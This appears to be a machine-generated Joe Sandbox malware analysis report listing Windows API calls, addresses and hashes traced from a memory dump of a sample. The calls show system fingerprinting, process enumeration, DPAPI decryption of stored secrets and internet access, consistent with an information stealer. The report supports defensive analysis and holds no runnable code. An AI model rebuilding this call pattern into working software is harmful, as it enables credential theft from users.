                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                      • String ID: :h@$:h@$@:h@
                                                                                                                                                                                                                                      • API String ID: 544645111-3492212131
                                                                                                                                                                                                                                      • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                      • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 211194620-0
                                                                                                                                                                                                                                      • Opcode ID: c173c51fbfe223dc8c5039b41b5fbfd2ab8ba70fab74c7fee496f720ccfcfbc1
                                                                                                                                                                                                                                      • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c173c51fbfe223dc8c5039b41b5fbfd2ab8ba70fab74c7fee496f720ccfcfbc1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 004141C0: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
                                                                                                                                                                                                                                        • Part of subcall function 004141C0: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
                                                                                                                                                                                                                                        • Part of subcall function 004141C0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
                                                                                                                                                                                                                                        • Part of subcall function 004141C0: HeapAlloc.KERNEL32(00000000), ref: 004142A7
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00414300: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                                                                                                                                                        • Part of subcall function 00414300: HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                                                                                                                                                        • Part of subcall function 00414300: RegOpenKeyExA.KERNEL32(80000002,040727F0,00000000,00020119,00000000), ref: 0041433B
                                                                                                                                                                                                                                        • Part of subcall function 00414300: RegQueryValueExA.KERNEL32(00000000,04076780,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                                                                                                                                                        • Part of subcall function 00414300: RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                                                                                                                                                        • Part of subcall function 00414380: GetCurrentProcess.KERNEL32(00000000,?,?,0040FF99,00000000,?,04077170,00000000,?,0041D74C,00000000,?,00000000,00000000,?,040707E8), ref: 0041438F
                                                                                                                                                                                                                                        • Part of subcall function 00414380: IsWow64Process.KERNEL32(00000000,?,?,0040FF99,00000000,?,04077170,00000000,?,0041D74C,00000000,?,00000000,00000000,?,040707E8), ref: 00414396
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04070898,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                        • Part of subcall function 00414450: GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
                                                                                                                                                                                                                                        • Part of subcall function 00414450: HeapAlloc.KERNEL32(00000000), ref: 00414464
                                                                                                                                                                                                                                        • Part of subcall function 00414450: GetLocalTime.KERNEL32(?), ref: 00414471
                                                                                                                                                                                                                                        • Part of subcall function 00414450: wsprintfA.USER32 ref: 004144A0
                                                                                                                                                                                                                                        • Part of subcall function 004144B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04076A38,00000000,?,0041D758,00000000,?,00000000,00000000,?,04077130,00000000), ref: 004144C0
                                                                                                                                                                                                                                        • Part of subcall function 004144B0: HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                        • Part of subcall function 004144B0: GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                        • Part of subcall function 00414530: GetUserDefaultLocaleName.KERNEL32(00000000,00000055,00000000,00000000,?,04076A38,00000000,?,0041D758,00000000,?,00000000,00000000,?,04077130,00000000), ref: 00414542
                                                                                                                                                                                                                                        • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                        • Part of subcall function 00414570: LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                        • Part of subcall function 00414570: GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                        • Part of subcall function 00414570: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                        • Part of subcall function 00414570: LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                        • Part of subcall function 00414710: GetSystemPowerStatus.KERNEL32(00000000), ref: 0041471A
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,04077190,00000000,?,0041D76C,00000000,?,00000000,00000000,?,04076A50,00000000,?,0041D768,00000000), ref: 0041037E
                                                                                                                                                                                                                                        • Part of subcall function 00415B70: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                        • Part of subcall function 00415B70: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                        • Part of subcall function 00415B70: CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                        • Part of subcall function 00414740: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                                                                                                                                                        • Part of subcall function 00414740: HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                                                                                                                                                        • Part of subcall function 00414740: RegOpenKeyExA.KERNEL32(80000002,04072828,00000000,00020119,00000000), ref: 0041477B
                                                                                                                                                                                                                                        • Part of subcall function 00414740: RegQueryValueExA.KERNEL32(00000000,04077410,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                                                                                                                                                        • Part of subcall function 00414740: RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                                                                                                                                                        • Part of subcall function 00414800: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00414846
                                                                                                                                                                                                                                        • Part of subcall function 00414800: GetLastError.KERNEL32 ref: 00414855
                                                                                                                                                                                                                                        • Part of subcall function 004147C0: GetSystemInfo.KERNEL32(00000000), ref: 004147CD
                                                                                                                                                                                                                                        • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147E3
                                                                                                                                                                                                                                        • Part of subcall function 00414960: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,04076828,00000000,?,0041D774,00000000,?,00000000,00000000,?,040768B8), ref: 0041496D
                                                                                                                                                                                                                                        • Part of subcall function 00414960: HeapAlloc.KERNEL32(00000000), ref: 00414974
                                                                                                                                                                                                                                        • Part of subcall function 00414960: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
                                                                                                                                                                                                                                        • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149AF
                                                                                                                                                                                                                                        • Part of subcall function 00414960: __aulldiv.LIBCMT ref: 004149BD
                                                                                                                                                                                                                                        • Part of subcall function 00414960: wsprintfA.USER32 ref: 004149E9
                                                                                                                                                                                                                                        • Part of subcall function 00414ED0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
                                                                                                                                                                                                                                        • Part of subcall function 00414ED0: HeapAlloc.KERNEL32(00000000), ref: 00414F23
                                                                                                                                                                                                                                        • Part of subcall function 00414ED0: wsprintfA.USER32 ref: 00414F3D
                                                                                                                                                                                                                                        • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,04073228,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                        • Part of subcall function 00414AE0: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                        • Part of subcall function 00414AE0: wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                        • Part of subcall function 00414AE0: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                        • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                        • Part of subcall function 00414AE0: RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                        • Part of subcall function 00414DE0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                        • Part of subcall function 00414DE0: Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                        • Part of subcall function 00414DE0: Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                        • Part of subcall function 00414DE0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041095B
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$Process$Alloc$CloseOpen$wsprintf$Namelstrcpy$InformationLocallstrlen$CurrentInfoKeyboardLayoutListLocaleProcess32QueryStatusSystemTimeUserValue__aulldivlstrcat$ChangeComputerCreateDefaultDirectoryEnumErrorFileFindFirstFreeGlobalHandleInternetLastLogicalMemoryModuleNextNotificationPowerProcessorSnapshotToolhelp32VolumeWindowsWow64Zone
                                                                                                                                                                                                                                      • String ID: E.A
                                                                                                                                                                                                                                      • API String ID: 1035121393-2211245587
                                                                                                                                                                                                                                      • Opcode ID: 49a92f44dda008f29ff3be1199fba4f2435d2cff060490da4c1bc1825e576d3b
                                                                                                                                                                                                                                      • Instruction ID: c29c4d19e1a1d8256a8b8cfc17993bd3f91cdea4a247a897ffed86f061f16859
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49a92f44dda008f29ff3be1199fba4f2435d2cff060490da4c1bc1825e576d3b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9372B076D10118AACB15FB91EC91EDEB73DAF14308F51439FB01662491EF346B89CBA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 00411378
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • strtok_s.MSVCRT ref: 0041146F
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpystrtok_s$lstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3184129880-0
                                                                                                                                                                                                                                      • Opcode ID: ebd071ba295f9e6345a8f1ce033e7ea8a96eb40d49cbc6ef6f62b0c380326253
                                                                                                                                                                                                                                      • Instruction ID: bc44fb65e395c18893d79e2daadfc8d7f4384440e0cba23ba4018ddaa6f79c9f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebd071ba295f9e6345a8f1ce033e7ea8a96eb40d49cbc6ef6f62b0c380326253
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04417175D00208DBCB04EFE5D855AEEBB75BF48304F00811EE51177290EB38AA85CFA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                        • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                        • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                      • StrStrA.SHLWAPI(00000000,040766A8), ref: 0040971B
                                                                                                                                                                                                                                        • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                        • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                        • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                        • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                        • Part of subcall function 00409540: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                        • Part of subcall function 00409540: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                        • Part of subcall function 00409540: LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
                                                                                                                                                                                                                                      • String ID: $DPAPI
                                                                                                                                                                                                                                      • API String ID: 2647593125-1819349886
                                                                                                                                                                                                                                      • Opcode ID: 9501cc2230a19d62742dd6fac07f5f7f22815d6b42f4b3c90aed0b997707f15c
                                                                                                                                                                                                                                      • Instruction ID: 25d6f3248392bfa9bca68fd769027b68fff5740b7e0b7820d89104a1b18a6e16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9501cc2230a19d62742dd6fac07f5f7f22815d6b42f4b3c90aed0b997707f15c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 493141B6D10108EBCF04DF94DC45AEFB7B9AF48704F14452DE905B3292E7389A44CBA5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00414E07
                                                                                                                                                                                                                                      • Process32First.KERNEL32(00000000,00000128), ref: 00414E1B
                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 00414E30
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNEL32(00000000), ref: 00414E9E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3491751439-0
                                                                                                                                                                                                                                      • Opcode ID: b217f11ee595118c12510416ca198f6e5f4cd8a2818699d74d2b05badb52671e
                                                                                                                                                                                                                                      • Instruction ID: b51d58226d22fc07b4aaea4bdcaba1b12d12dab42e387443cd86e66b2ce9f1c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b217f11ee595118c12510416ca198f6e5f4cd8a2818699d74d2b05badb52671e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED211D759002189BCB24EB61DC95FDEB779AF54304F1041DAA50A66190DF38AFC5CF94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00411879,80000000,00000003,00000000,00000003,00000080,00000000,?,00411879,?), ref: 004159FC
                                                                                                                                                                                                                                      • GetFileSizeEx.KERNEL32(000000FF,00411879), ref: 00415A19
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 00415A27
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1378416451-0
                                                                                                                                                                                                                                      • Opcode ID: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                      • Instruction ID: adbcd47bb22ca6d6b42933acd4cabc8e10c5a14c322029dfd4b487fe3fd33794
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3a5877fc348a9a64368c001e27037213673241a1fda354ede690d4ee948c5a4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9F03139F44604FBDB20DBF0DC85BDE7779BF44710F118255B951A7280DA7496428B44
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0406DD00,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001770), ref: 004137C4
